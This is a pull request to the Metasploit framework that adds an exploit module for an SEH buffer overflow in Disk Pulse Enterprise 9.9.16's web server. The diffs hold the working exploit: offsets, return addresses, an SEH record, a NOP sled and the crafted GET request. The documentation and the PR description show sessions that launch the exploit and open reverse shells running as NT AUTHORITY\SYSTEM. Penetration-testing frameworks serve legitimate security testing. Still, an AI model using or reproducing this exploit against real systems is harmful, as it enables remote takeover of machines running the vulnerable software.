### PR TITLE
Add Disk_pulse_enterprise_get module

### DIFF
--- a/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md
+++ b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md
@@ -1,0 +1,55 @@
+## Vulnerable Application
+
+  Tested on Windows 7 x64 and x86.
+  
+  Install the application from the link below and enable the web server by going to Options -> Server -> Enable Web Server on Port.
+  
+  [Disk Pulse Enterprise v 9.9.16](https://www.exploit-db.com/apps/45ce22525c87c0762f6e467db6ddfcbc-diskpulseent_setup_v9.9.16.exe)
+
+## Verification Steps
+
+  1. Install the application and set the option above to enable the web server
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/http/disk_pulse_enterprise_get```
+  5. Set options and payload
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Options
+
+  **RHOST**
+
+  IP address of the remote host running the server.
+  
+  **RPORT**
+  
+  Port that the web server is running on.  Default is 80 but it can be changed when setting up the program or in the options.
+
+## Scenarios
+
+  To obtain a shell:
+
+  ```
+msf > use exploit/windows/http/disk_pulse_enterprise_get
+msf exploit(disk_pulse_enterprise_get) > set payload windows/shell_reverse_tcp
+payload => windows/shell_reverse_tcp
+msf exploit(disk_pulse_enterprise_get) > set RHOST x.x.x.x
+RHOST => x.x.x.x
+msf exploit(disk_pulse_enterprise_get) > set LHOST y.y.y.y
+LHOST => y.y.y.y
+msf exploit(disk_pulse_enterprise_get) > set LPORT 1234
+LPORT => 1234
+msf exploit(disk_pulse_enterprise_get) > set RPORT 8080
+RPORT => 8080
+msf exploit(disk_pulse_enterprise_get) > exploit
+
+[*] Started reverse TCP handler on y.y.y.y:1234
+[*] Generating exploit...
+[*] Sending exploit...
+[*] Command shell session 1 opened (y.y.y.y:1234 -> x.x.x.x:64567) at 2017-09-14 10:52:06 -0500
+
+Microsoft Windows [Version 6.1.7600]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Windows\system32>
+  ```

--- a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -13,10 +13,10 @@ class MetasploitModule < Msf::Exploit::Remote
  
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Disk Pulse Enterprise Login Buffer Overflow',
+      'Name'           => 'Disk Pulse Enterprise GET Buffer Overflow',
       'Description'    => %q{
         This module exploits an SEH buffer overflow in Disk Pulse Enterprise
-        9.9.16. If a malicious user sends a malicious HTTP GET request,
+        9.9.16. If a malicious user sends a crafted HTTP GET request
         it is possible to execute a payload that would run under the Windows
         NT AUTHORITY\SYSTEM account.
       },
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
     exp << generate_seh_record(target.ret)
     exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
     exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
-    exp << 'B' * (5000 - exp.length) #padding
+    exp << 'B' * (5000 - exp.length) # padding
 
     print_status("Sending exploit...")
 

--- a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -2,15 +2,15 @@
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
- 
+
 require 'msf/core'
- 
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
- 
+
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::Seh
- 
+
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Disk Pulse Enterprise GET Buffer Overflow',
@@ -52,24 +52,24 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => true,
       'DisclosureDate' => 'Aug 25 2017',
       'DefaultTarget'  => 0))
- 
+
     register_options([Opt::RPORT(80)], self.class)
- 
+
   end
- 
+
   def check
     res = send_request_cgi({
       'uri'    => '/',
       'method' => 'GET'
     })
- 
+
     if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.9\.16/
       return Exploit::CheckCode::Appears
     end
- 
+
     return Exploit::CheckCode::Safe
   end
- 
+
   def exploit
     connect
 

--- a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
  
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::Egghunter
   include Msf::Exploit::Remote::Seh
  
   def initialize(info = {})
@@ -24,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Chance Johnson', # module - hackback.sh - albatross@loftwing.net
+          'Chance Johnson', # msf module - albatross@loftwing.net
           'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
         ],
       'References'     =>
@@ -38,19 +37,20 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Payload'        =>
         {
+          'EncoderType' => "alpha_mixed",
           'BadChars' => "\x00\x0a\x0d\x26"
         },
       'Targets'        =>
         [
           [ 'Disk Pulse Enterprise 9.9.16',
             {
-              'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
-              'Offset' => 12600
+              'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
+              'Offset' => 2492
             }
           ],
         ],
       'Privileged'     => true,
-      'DisclosureDate' => 'Oct 03 2016',
+      'DisclosureDate' => 'Aug 25 2017',
       'DefaultTarget'  => 0))
  
     register_options([Opt::RPORT(80)], self.class)
@@ -71,7 +71,28 @@ class MetasploitModule < Msf::Exploit::Remote
   end
  
   def exploit
-    
- 
+    connect
+
+    print_status("Generating exploit...")
+    exp = payload.encoded
+    exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
+    exp << "\xEB\x10\x90\x90" # nSEH - jmp short 0x12 down to next record
+    exp << "\xDD\xAD\x13\x10" # SEH  - pop ebx, pop ecx, retn - libspp.dll
+    exp << "\x90" * 10
+    exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
+    exp << 'B' * (5000 - exp.length)
+
+    print_status("Sending exploit.")
+
+    res = send_request_cgi({
+      'uri' => '/../' + exp,
+      'method' => 'GET',
+      'host' => '4.2.2.2',
+      'connection' => 'keep-alive'
+    })
+
+  handler
+  disconnect
+
   end
 end

--- a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -14,12 +12,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Disk Pulse Enterprise GET Buffer Overflow',
-      'Description'    => %q{
+      'Description'    => %q(
         This module exploits an SEH buffer overflow in Disk Pulse Enterprise
         9.9.16. If a malicious user sends a crafted HTTP GET request
         it is possible to execute a payload that would run under the Windows
         NT AUTHORITY\SYSTEM account.
-      },
+      ),
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
@@ -46,24 +44,22 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
               'Offset' => 2492
-            }
-          ],
+            }]
         ],
       'Privileged'     => true,
       'DisclosureDate' => 'Aug 25 2017',
       'DefaultTarget'  => 0))
 
-    register_options([Opt::RPORT(80)], self.class)
-
+    register_options([Opt::RPORT(80)])
   end
 
   def check
-    res = send_request_cgi({
-      'uri'    => '/',
-      'method' => 'GET'
-    })
+    res = send_request_cgi(
+      'uri'    =>  '/',
+      'method' =>  'GET'
+    )
 
-    if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.9\.16/
+    if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/
       return Exploit::CheckCode::Appears
     end
 
@@ -83,15 +79,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Sending exploit...")
 
-    res = send_request_cgi({
-      'uri' => '/../' + exp,
-      'method' => 'GET',
-      'host' => '4.2.2.2',
-      'connection' => 'keep-alive'
-    })
+    send_request_cgi(
+      'uri' =>  '/../' + exp,
+      'method' =>  'GET',
+      'host' =>  '4.2.2.2',
+      'connection' =>  'keep-alive'
+    )
 
-  handler
-  disconnect
-
+    handler
+    disconnect
   end
 end

--- a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -1,0 +1,77 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+require 'msf/core'
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Egghunter
+  include Msf::Exploit::Remote::Seh
+ 
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Disk Pulse Enterprise Login Buffer Overflow',
+      'Description'    => %q{
+        This module exploits an SEH buffer overflow in Disk Pulse Enterprise
+        9.9.16. If a malicious user sends a malicious HTTP GET request,
+        it is possible to execute a payload that would run under the Windows
+        NT AUTHORITY\SYSTEM account.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chance Johnson', # module - hackback.sh - albatross@loftwing.net
+          'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '42560' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'none'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x26"
+        },
+      'Targets'        =>
+        [
+          [ 'Disk Pulse Enterprise 9.9.16',
+            {
+              'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
+              'Offset' => 12600
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Oct 03 2016',
+      'DefaultTarget'  => 0))
+ 
+    register_options([Opt::RPORT(80)], self.class)
+ 
+  end
+ 
+  def check
+    res = send_request_cgi({
+      'uri'    => '/',
+      'method' => 'GET'
+    })
+ 
+    if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.9\.16/
+      return Exploit::CheckCode::Appears
+    end
+ 
+    return Exploit::CheckCode::Safe
+  end
+ 
+  def exploit
+    
+ 
+  end
+end

--- a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'none'
+          'EXITFUNC' => 'thread'
         },
       'Platform'       => 'win',
       'Payload'        =>
@@ -76,13 +76,12 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Generating exploit...")
     exp = payload.encoded
     exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
-    exp << "\xEB\x10\x90\x90" # nSEH - jmp short 0x12 down to next record
-    exp << "\xDD\xAD\x13\x10" # SEH  - pop ebx, pop ecx, retn - libspp.dll
-    exp << "\x90" * 10
+    exp << generate_seh_record(target.ret)
+    exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
     exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
-    exp << 'B' * (5000 - exp.length)
+    exp << 'B' * (5000 - exp.length) #padding
 
-    print_status("Sending exploit.")
+    print_status("Sending exploit...")
 
     res = send_request_cgi({
       'uri' => '/../' + exp,


### PR DESCRIPTION
## Vulnerable Application
A Windows 7 x64 system running Disk Pulse Enterprise v9.9.16 with its web interface port turned on.  This has to be changed from default in the program settings:  Options -> Server -> Enable Web Server on Port.  

## Verification

1. Start `msfconsole`
2. `use exploit/windows/http/disk_pulse_enterprise_get`
3. Set appropriate options
4. run `exploit`

## Options
```
RHOST                     yes       The target address
RPORT    80               yes       The target port (TCP)
```

## Scenarios

```
msf exploit(disk_pulse_enterprise_get) > exploit

[*] Started reverse TCP handler on x.x.x.x:1234
[*] Generating exploit...
[*] Sending exploit.
[*] Command shell session 1 opened (x.x.x.x:1234 -> x.x.x.x:57991) at 2017-09-13 10:34:18 -0500

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system
```